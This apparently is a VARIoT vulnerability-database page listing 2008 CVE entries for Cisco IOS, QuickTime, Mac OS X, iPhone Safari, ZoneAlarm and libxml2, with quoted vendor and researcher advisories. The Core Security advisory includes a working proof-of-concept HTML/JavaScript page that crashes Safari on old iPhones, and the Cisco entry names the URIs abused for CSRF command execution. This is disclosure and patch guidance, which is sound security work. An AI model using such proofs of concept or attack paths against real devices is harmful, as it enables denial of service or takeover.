Sign-up

VARIoT IoT vulnerabilities database

Affected products: vendor, model and version
CWE format is 'CWE-number'. Threat type can be: remote or local
Look up free text in title and description

VAR-200809-0053 CVE-2008-4128 Cisco IOS In HTTP Administration Multiple cross-site request forgery vulnerabilities related to components

Related entries in the VARIoT exploits database: VAR-E-200809-0317, VAR-E-200809-0315, VAR-E-200809-0316		 CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Multiple cross-site request forgery (CSRF) vulnerabilities in the HTTP Administration component in Cisco IOS 12.4 on the 871 Integrated Services Router allow remote attackers to execute arbitrary commands via (1) a certain "show privilege" command to the /level/15/exec/- URI, and (2) a certain "alias exec" command to the /level/15/exec/-/configure/http URI. NOTE: some of these details are obtained from third party information. By a remote attacker, (1) /level/15/exec/- URI Specific to 'show privilege' command (2) /level/15/exec/-/configure/http URI. Specific to 'alias exec' An arbitrary command may be executed via a command.Please refer to the “Overview” for the impact of this vulnerability. The Cisco 871 Integrated Services Router is prone to a cross-site request-forgery vulnerability. Successful exploits can run arbitrary commands on affected devices. This may lead to further network-based attacks. The 871 Integrated Services Router under IOS 12.4 is vulnerable; other products and versions may also be affected
VAR-200809-0045 CVE-2008-4116 Apple QuickTime and iTunes Vulnerable to buffer overflow CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Buffer overflow in Apple QuickTime 7.5.5 and iTunes 8.0 allows remote attackers to cause a denial of service (browser crash) or possibly execute arbitrary code via a long type attribute in a quicktime tag (1) on a web page or embedded in a (2) .mp4 or (3) .mov file, possibly related to the Check_stack_cookie function and an off-by-one error that leads to a heap-based buffer overflow. (1) Web On the page quicktime tag (2) .mp4 Embedded in the file quicktime tag (3) .mov Embedded in the file quicktime tag. Apple QuickTime is prone to a buffer-overflow vulnerability. An attacker can exploit this issue by enticing an unsuspecting user to open a specially crafted file. Successfully exploiting this issue allows remote attackers to cause the affected application to crash. Reportedly, code execution is not possible. This issue affects QuickTime 7.5.5; other versions may also be vulnerable. The <? quicktime type= ?> tag does not correctly handle the long attribute string. If the user uses Quicktime or Itunes media player to open the webpage or . A single-byte heap overflow can be triggered, resulting in a denial of service or the execution of arbitrary instructions
VAR-200809-0192 CVE-2008-3618 Apple Mac OS X file sharing allows authenticated remote access to files and directories CVSS V2: 9.0
CVSS V3: -
Severity: HIGH
The File Sharing pane in the Sharing preference pane in Apple Mac OS X 10.5 through 10.5.4 does not inform users that the complete contents of their own home directories are shared for their own use, which might allow attackers to leverage other vulnerabilities and access files for which sharing was unintended. The security update addresses a total of 17 new vulnerabilities that affect the Apple Type Services, Directory Services, Finder, ImageIO, Kernel, Login Windows, SearchKit, System Configuration, System Preferences, Time Machine, VideoConference, and Wiki Server components of Mac OS X. The advisory also contains security updates for 17 previously reported issues. Attackers could exploit these vulnerabilities to execute arbitrary code, gain access to sensitive information, or cause a denial of service. I. II. Impact The impacts of these vulnerabilities vary. Potential consequences include arbitrary code execution, sensitive information disclosure, denial of service, privilege escalation, or DNS cache poisoning. III. These and other updates are available via Software Update or via Apple Downloads. IV. Please send email to <cert@cert.org> with "TA08-260A Feedback VU#547251" in the subject. _________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. _________________________________________________________________ Produced 2008 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History September 16 2008: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iQEVAwUBSNANfnIHljM+H4irAQLlgQf+PqS9CZoUf6f9zPZNbyKDhBYETyc31z6G yrF/p3T2ZfH7qK43GbgSHbriAHi+nzlKdYk6vbt++6mE3Jr3QHmk/gyjp4BD8whS 1Qp6wamRmDUMgboseftfE/Pa/lAoFSejvUsGdgbkrNNH/95LcsPFqL+6pBQHna2c nFyEz3vMMPGxJr99Nf0Vda0O255fcjpvcVddbj005wvmyA83IT43ZFgAoINkKDvi qRo2jNmucDoQZTzX/ap1zU3ZSu5dBHlnH1qUK0BvFQSeLeGwaMoijkn2xqpCbzsV 4u3ErEkcLAQVMsTJBEzIs22WU4yRWF07eumhng3rIgGjbXuleNPfig== =SOoC -----END PGP SIGNATURE-----
VAR-200809-0191 CVE-2008-3617 Apple Mac OS X file sharing allows authenticated remote access to files and directories CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Remote Management and Screen Sharing in Apple Mac OS X 10.5 through 10.5.4, when used to set a password for a VNC viewer, displays additional input characters beyond the maximum password length, which might make it easier for attackers to guess passwords that the user believed were longer. Apple Mac OS X Leopard does not accurately reflect which files and directories are available via sharing. The security update addresses a total of 17 new vulnerabilities that affect the Apple Type Services, Directory Services, Finder, ImageIO, Kernel, Login Windows, SearchKit, System Configuration, System Preferences, Time Machine, VideoConference, and Wiki Server components of Mac OS X. The advisory also contains security updates for 17 previously reported issues. The password field can display more than 8 characters, that is, extra characters are used in the password. Attackers could exploit these vulnerabilities to execute arbitrary code, gain access to sensitive information, or cause a denial of service. I. II. Impact The impacts of these vulnerabilities vary. Potential consequences include arbitrary code execution, sensitive information disclosure, denial of service, privilege escalation, or DNS cache poisoning. III. These and other updates are available via Software Update or via Apple Downloads. IV. Please send email to <cert@cert.org> with "TA08-260A Feedback VU#547251" in the subject. _________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. _________________________________________________________________ Produced 2008 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History September 16 2008: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iQEVAwUBSNANfnIHljM+H4irAQLlgQf+PqS9CZoUf6f9zPZNbyKDhBYETyc31z6G yrF/p3T2ZfH7qK43GbgSHbriAHi+nzlKdYk6vbt++6mE3Jr3QHmk/gyjp4BD8whS 1Qp6wamRmDUMgboseftfE/Pa/lAoFSejvUsGdgbkrNNH/95LcsPFqL+6pBQHna2c nFyEz3vMMPGxJr99Nf0Vda0O255fcjpvcVddbj005wvmyA83IT43ZFgAoINkKDvi qRo2jNmucDoQZTzX/ap1zU3ZSu5dBHlnH1qUK0BvFQSeLeGwaMoijkn2xqpCbzsV 4u3ErEkcLAQVMsTJBEzIs22WU4yRWF07eumhng3rIgGjbXuleNPfig== =SOoC -----END PGP SIGNATURE-----
VAR-200809-0236 CVE-2008-3950 Apple iPhone of _web_drawInRect:withFont:ellipsis:alignment:measureOnly Service disruption in functions (DoS) Vulnerabilities CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Off-by-one error in the _web_drawInRect:withFont:ellipsis:alignment:measureOnly function in WebKit in Safari in Apple iPhone 1.1.4 and 2.0 and iPod touch 1.1.4 and 2.0 allows remote attackers to cause a denial of service (browser crash) via a JavaScript alert call with an argument that lacks breakable characters and has a length that is a multiple of the memory page size, leading to an out-of-bounds read. Apple iPhone and iPod touch are prone to a remote denial-of-service vulnerability that occurs in the WebKit library used by the Safari browser. Remote attackers can exploit this issue to crash the affected browser installed on the devices, denying service to legitimate users. The following devices and corresponding firmware are affected: iPhone 1.1.4 and 2.0 iPod touch 1.1.4 and 2.0. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ iPhone Safari JavaScript alert Denial of Service 1. *Advisory Information* Title: iPhone Safari JavaScript alert Denial of Service Advisory ID: CORE-2008-0603 Advisory URL: http://www.coresecurity.com/content/iphone-safari-javascript-alert-denial-of-service Date published: 2008-09-12 Date of last update: 2008-09-12 Vendors contacted: Apple Security Release mode: Coordinated release 2. *Vulnerability Information* Class: Client-side Denial of Service Remotely Exploitable: Yes Locally Exploitable: No Bugtraq ID: 31061 CVE Name: CVE-2008-3950 3. By inserting a special string on the 'alert()' JavaScript method, it's possible to crash Safari via an outbound memory read triggering an access violation. 4. *Vulnerable packages* . iPhone v1.1.4 and v2.0 . iPod touch v1.1.4 and v2.0 5. *Non-vulnerable packages* . iPhone v2.1 . iPod Touch v2.1 6. *Vendor Information* The information on this section was provided verbatim by the vendor. 6.1. *Availability* Apple security updates are available via the Software Update mechanism: http://support.apple.com/kb/HT1338 Apple security updates are also available for manual download via: http://www.apple.com/support/downloads/ 6.2. *Cross-References* We generally do not publish advisories for denial of service issues unless there are more serious security consequences. As such, we are not planning to describe the fix for this issue, but we do appreciate your having reported it to us. If you provide cross-referencing information in your advisory please link to the following URL: http://support.apple.com/kb/HT1222 7. *Credits* Nicolas Economou from Core Security Technologies discovered and researched this vulnerability. 8. The vulnerable function is '_web_drawInRect:withFont:ellipsis:alignment:measureOnly: : NSString(WebStringDrawing)' which is one of the functions used by the 'alert()' method on this implementation of JavaScript. The 'alert()' method receives a string parameter to be showed on screen. When this string parameter is large, the library maps the required memory to store it. As the memory page size is 4096 bytes, the reserved memory is rounded-up, that is, the rest of the page is marked as reserved but unused. If a string has length divisible by 4096, it fits exactly in the memory reserved, no bytes are left unused. When the vulnerable function is called, it calls the method 'WebCore::nextBreakablePosition' in charge of searching for "breakable" characters, for example a space, character "-", etcetera, and returns the position where the first "breakable" character was found. This method takes as parameter the same string passed to the 'alert' on JavaScript. In the case that no "breakable" characters are found, it returns the final position of the string plus 1. For example, if the string size is '0x1000' and the function doesn't find anything, it return position '0x1000', counting from zero, obviously. The crash is generated when function '_web_drawInRect:withFont:ellipsis:alignment:measureOnly' receives as parameter a large string with a size multiple of 4096 without "breakable" characters and then passes it to method 'WebCore::nextBreakablePosition'. Once the method is called, it uses the return value to access the out-of-bound string position, just outside of the memory allocated and possibly located on a non-mapped memory area. The vulnerability is produced by an invalid access read. The function fragment where the vulnerability was found is showed: /----------- 31739CB4 MOV R1, R8 ; R1=string 31739CB8 MOV R2, R10 ; R10=string len 31739CBC MOV R3, R8 31739CC0 MOV R0, R4 31739CC4 BL WebCore::nextBreakablePosition(ushort const*,int,int,bool) 31739CC8 LDR R1, =0x1008 31739CCC MOV R3, R0,LSL#1 ; R0=returned position 31739CD0 MOV R5, R0 31739CD4 LDRH R0, [R4,R3] ; &lt;---- CRASH="" !!! 31739CD8 ADD R6, R4, R3 31739CDC BL _u_getIntPropertyValue 31739CE0 CMP R0, #0x1D 31739CE4 BHI loc_31739D1C - -----------/ The following proof of concept HTML code generates the string with length multiple of 4096 to demonstrate the bug. /----------- <html> <body> <form> <script type="text/javascript" language="JavaScript"> var st = "A"; alert ( "Crashing Safari on iPhone..." ); for ( var d = 1 ; d <= 16 ; d ++ ) { st += st; } alert ( st ); </script> </form> </body> </html> - -----------/ When debugging Safari on iPhone with 'iphonedbg'[1] the proof-of-concept produces the following output: /----------- ACCESS VIOLATION r0=00010000 r1=00001008 r2=00000041 r3=00020000 r4=02e00000 r5=00010000 r6=00000001 r7=2ffff04c r8=00000000 r9=3800da94 r10=00010000 r11=001833e0 r12=ffffffff sp=2fffe70c lr=31739cc8 pc=31739cd4 ctrl=60000010 WebCore!-[NSString(WebStringDrawing) _web_drawInRect:withFont:ellipsis:alignment:measureOnly:]+268: pc=31739cd4 b3 00 94 e1 ldrh r0, [r4, r3] - -----------/ It can be seen that the instruction 'ldrh r0, [r4, r3]' tries to read the memory location pointed by 'R4+R3', in this case, unmapped memory. Making a dump of the memory area accessed, we see the following: /----------- 31739cd4> db r4+r3-40 02e1ffc0 | 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 | A.A.A.A.A.A.A.A. 02e1ffd0 | 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 | A.A.A.A.A.A.A.A. 02e1ffe0 | 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 | A.A.A.A.A.A.A.A. 02e1fff0 | 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 | A.A.A.A.A.A.A.A. 02e20000 | ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? | ???????????????? 02e20010 | ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? | ???????????????? 02e20020 | ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? | ???????????????? 02e20030 | ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? | ???????????????? - -----------/ 9. *Report Timeline* 2008-07-21: Core notifies the vendor of the bug and sends the advisory draft (with PoC). Core states that version 1.1.4 and previous versions are affected. 2008-07-24: Core asks for confirmation of reception of the previous email. 2008-07-24: Vendor acknowledges and states that they will analyze the bug. 2008-07-29: Vendor confirms the existence of the bug, but doesn't consider that this client-side denial-of-service affects the security of the system. It communicates that version 2.0 is also affected and requests to wait until a patch is available before releasing the advisory. 2008-07-29: Core replies that further testing reveals that 2.0 is also affected (crash sent), that the issue is considered by Core as a security problem, and asks for concrete information regarding dates and versions of the patch. 2008-07-29: Vendor confirms that versions 1.1.4 and 2.0.0 are affected, and declines to provide an estimated date for the release of fixed versions at that moment. 2008-07-29: Core requests an estimation of when the update information will be available. 2008-08-04: Vendor replies that the timeframe will be communicated to Core as soon as they have it. 2008-08-26: Core asks for any update of the schedule to fix the DoS, and notifies the Vendor that the publication was rescheduled to September 16th. 2008-09-05: Vendor estimates that their patch and security bulletin would be released early on September 7th week. 2008-09-05: Core confirms that the advisory will be released as soon as the security bulletin is sent to Core. 2008-09-08: Core requests a more precise timing to the vendor. 2008-09-08: Vendor confirms that the Apple patch is not going out on Monday 8th, and requests Core to hold off the advisory until the Vendor's security bulletin is out. 2008-09-11: Core requests the vendor a new date for re-scheduling the publication of advisory CORE-2008-0603, notices that a security update has been released for iPod touch on September 9th without notification to Core and asks for details. 2008-09-12: Vendor responds that the update of September 9th fixes the bug for iPod touch and the update released on Friday 12th fixes it for iPhone. 2008-09-12: Core publishes advisory CORE-2008-0603. 10. *References* [1] iPhoneDbg Toolkit http://oss.coresecurity.com/projects/iphonedbg.html. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIyuMAyNibggitWa0RArBaAJ9NOuyo5DwXda571Ltra2BM4uZw+ACfYtCU 5pu4hSqtL8R+7syRM5nhnDQ= =i+Yt -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
VAR-200908-0093 CVE-2008-7009 Check Point ZoneAlarm Security Suite of multiscan.exe Vulnerable to buffer overflow CVSS V2: 6.9
CVSS V3: -
Severity: MEDIUM
Buffer overflow in multiscan.exe in Check Point ZoneAlarm Security Suite 7.0.483.000 and 8.0.020.000 allows local users to execute arbitrary code via a file or directory with a long path. NOTE: some of these details are obtained from third party information. ZoneAlarm Security Suite is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input when performing virus scans on long directory paths. Remote attackers may leverage this issue to execute arbitrary code with SYSTEM-level privileges and gain complete access to the vulnerable computer. Failed attacks will cause denial-of-service conditions. This issue affects ZoneAlarm Security Suite 7.0.483.000; other versions may also be affected. ZoneAlarm is a personal computer firewall that protects personal data and privacy. ---------------------------------------------------------------------- Do you need accurate and reliable IDS / IPS / AV detection rules? Get in-depth vulnerability details: http://secunia.com/binary_analysis/sample_analysis/ ---------------------------------------------------------------------- TITLE: ZoneAlarm Internet Security Suite "multiscan.exe" Buffer Overflow SECUNIA ADVISORY ID: SA31832 VERIFY ADVISORY: http://secunia.com/advisories/31832/ CRITICAL: Less critical IMPACT: System access WHERE: >From remote SOFTWARE: ZoneAlarm Internet Security Suite 8.x http://secunia.com/advisories/product/19816/ ZoneAlarm Internet Security Suite 7.x http://secunia.com/advisories/product/19815/ DESCRIPTION: Juan Pablo Lopez Yacubian has discovered a vulnerability in ZoneAlarm Internet Security Suite, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in multiscan.exe when processing input from files passed via the "-f" command line parameter. This can be exploited to cause a buffer overflow by e.g. tricking a user into scanning a file or directory with a specially crafted name via the "Scan with ZoneAlam Anti-virus" shell extension. Successful exploitation may allow the execution of arbitrary code. The vulnerability is confirmed in version 7.0.483.000 and 8.0.020.000. SOLUTION: A solution is not available. PROVIDED AND/OR DISCOVERED BY: Juan Pablo Lopez Yacubian ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------
VAR-200809-0566 CVE-2008-3529 libxml2 of xmlParseAttValueComplex Heap-based buffer overflow vulnerability in functions CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Heap-based buffer overflow in the xmlParseAttValueComplex function in parser.c in libxml2 before 2.7.0 allows context-dependent attackers to cause a denial of service (crash) or execute arbitrary code via a long XML entity name. The 'libxml' library is prone to a heap-based buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary within the context of an application using the affected library. Failed exploit attempts will result in a denial-of-service vulnerability. The libxml package provides a library of functions that allow users to manipulate XML files, including support for reading, modifying, and writing XML and HTML files. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200812-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: libxml2: Multiple vulnerabilities Date: December 02, 2008 Bugs: #234099, #237806, #239346, #245960 ID: 200812-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities in libxml2 might lead to execution of arbitrary code or Denial of Service. Background ========== libxml2 is the XML (eXtended Markup Language) C parser and toolkit initially developed for the Gnome project. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-libs/libxml2 < 2.7.2-r1 >= 2.7.2-r1 Description =========== Multiple vulnerabilities were reported in libxml2: * Andreas Solberg reported that libxml2 does not properly detect recursion during entity expansion in an attribute value (CVE-2008-3281). * A heap-based buffer overflow has been reported in the xmlParseAttValueComplex() function in parser.c (CVE-2008-3529). * Christian Weiske reported that predefined entity definitions in entities are not properly handled (CVE-2008-4409). * Drew Yao of Apple Product Security reported an integer overflow in the xmlBufferResize() function that can lead to an infinite loop (CVE-2008-4225). * Drew Yao of Apple Product Security reported an integer overflow in the xmlSAX2Characters() function leading to a memory corruption (CVE-2008-4226). Impact ====== A remote attacker could entice a user or automated system to open a specially crafted XML document with an application using libxml2, possibly resulting in the exeution of arbitrary code or a high CPU and memory consumption. Workaround ========== There is no known workaround at this time. Resolution ========== All libxml2 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.7.2-r1" References ========== [ 1 ] CVE-2008-3281 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3281 [ 2 ] CVE-2008-3529 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3529 [ 3 ] CVE-2008-4409 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4409 [ 4 ] CVE-2008-4225 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4225 [ 5 ] CVE-2008-4226 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4226 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200812-06.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . =========================================================== Ubuntu Security Notice USN-815-1 August 11, 2009 libxml2 vulnerabilities CVE-2008-3529, CVE-2009-2414, CVE-2009-2416 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libxml2 2.6.24.dfsg-1ubuntu1.5 Ubuntu 8.04 LTS: libxml2 2.6.31.dfsg-2ubuntu1.4 Ubuntu 8.10: libxml2 2.6.32.dfsg-4ubuntu1.2 Ubuntu 9.04: libxml2 2.6.32.dfsg-5ubuntu4.2 After a standard system upgrade you need to restart your sessions to effect the necessary changes. Details follow: It was discovered that libxml2 did not correctly handle root XML document element DTD definitions. (CVE-2009-2414) It was discovered that libxml2 did not correctly parse Notation and Enumeration attribute types. (CVE-2009-2416) USN-644-1 fixed a vulnerability in libxml2. This advisory provides the corresponding update for Ubuntu 9.04. Original advisory details: It was discovered that libxml2 did not correctly handle long entity names. (CVE-2008-3529) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.5.diff.gz Size/MD5: 62776 d89c05d4e7cf575a70f0f9d98db043c0 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.5.dsc Size/MD5: 902 5a6bda5a6cff7f1dd1b9ac5a4a4d3dee http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg.orig.tar.gz Size/MD5: 3293814 461eb1bf7f0c845f7ff7d9b1a4c4eac8 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.6.24.dfsg-1ubuntu1.5_all.deb Size/MD5: 1253066 7f0900285bcd5980021afb1187a65882 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.24.dfsg-1ubuntu1.5_all.deb Size/MD5: 19366 bdcb84dd5b172486d90babd60f7abe3e amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.24.dfsg-1ubuntu1.5_amd64.deb Size/MD5: 918870 5c542ff6be1ebfe37ed53fb5c42d4f9a http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.24.dfsg-1ubuntu1.5_amd64.deb Size/MD5: 737430 1277b3e55c846153da8612c2b1bd6c05 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.24.dfsg-1ubuntu1.5_amd64.deb Size/MD5: 36698 941d28a2ab8c583df8ac8c4bd6053f7e http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.5_amd64.deb Size/MD5: 753036 159fc7694915d15d86868cbd34ff1ebb http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python2.4-libxml2_2.6.24.dfsg-1ubuntu1.5_amd64.deb Size/MD5: 181652 5e66ae52ee397d016840038de0a2f057 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.24.dfsg-1ubuntu1.5_i386.deb Size/MD5: 766190 9afc9a70749f02669713a807ceaf2ad3 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.24.dfsg-1ubuntu1.5_i386.deb Size/MD5: 642032 6e7ac3450d6220b0b5b827483622d145 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.24.dfsg-1ubuntu1.5_i386.deb Size/MD5: 32980 5fc874170294ea6f6c94a690a01dbad7 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.5_i386.deb Size/MD5: 685138 4a8510c2c2b66f6c55e4155af4c7e091 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python2.4-libxml2_2.6.24.dfsg-1ubuntu1.5_i386.deb Size/MD5: 166422 6cc5c19adb5ccb9db5fec9286790af1a powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.24.dfsg-1ubuntu1.5_powerpc.deb Size/MD5: 905098 dd7b7a8b76af164a73785d7c40be445c http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.24.dfsg-1ubuntu1.5_powerpc.deb Size/MD5: 761238 2f407df0d47072583fdbc6465b744b6a http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.24.dfsg-1ubuntu1.5_powerpc.deb Size/MD5: 37424 c584cfd1c16a16106d10a8d090aaccf0 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.5_powerpc.deb Size/MD5: 734090 42f54b7042c391a8326558cdc924fcc2 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python2.4-libxml2_2.6.24.dfsg-1ubuntu1.5_powerpc.deb Size/MD5: 170808 8f4821f282453c7c516ba36e2c5fadd9 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.24.dfsg-1ubuntu1.5_sparc.deb Size/MD5: 745812 84c50f29ba04c9c815e561e9c9b825ee http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.24.dfsg-1ubuntu1.5_sparc.deb Size/MD5: 703538 3f2e7fbc56bf64aa9631c567852dadfd http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.24.dfsg-1ubuntu1.5_sparc.deb Size/MD5: 34312 540c1cb95cd95eafe94cad690e0c7ae2 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.5_sparc.deb Size/MD5: 716890 41e8303a6e6d3fb335a2fb06b4e1bc7a http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python2.4-libxml2_2.6.24.dfsg-1ubuntu1.5_sparc.deb Size/MD5: 174772 567a3fdd900bc9cb34e5f2f668e48851 Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4.diff.gz Size/MD5: 66035 c629b5480445cc4380bf3bae181d8484 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4.dsc Size/MD5: 1072 67e7f23a4d73713a67233d554f6c8b5c http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg.orig.tar.gz Size/MD5: 3442959 8498d4e6f284d2f0a01560f089cb5a3e Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.6.31.dfsg-2ubuntu1.4_all.deb Size/MD5: 1302458 9454932b37039a5af38524f7c4c0b294 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_amd64.deb Size/MD5: 939490 5c561ccc0fe42d44216631b89b1addf2 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.4_amd64.deb Size/MD5: 754024 1d43d32a7125d4b2ed113c7dbb469bdf http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.4_amd64.udeb Size/MD5: 580472 d2e2babcee294fdd0f202d5d122c0dd2 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.4_amd64.deb Size/MD5: 37052 440a067962c6e1e7ffe17071bb33fd09 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4_amd64.deb Size/MD5: 832898 b129c03e0971727757567d89a6d32269 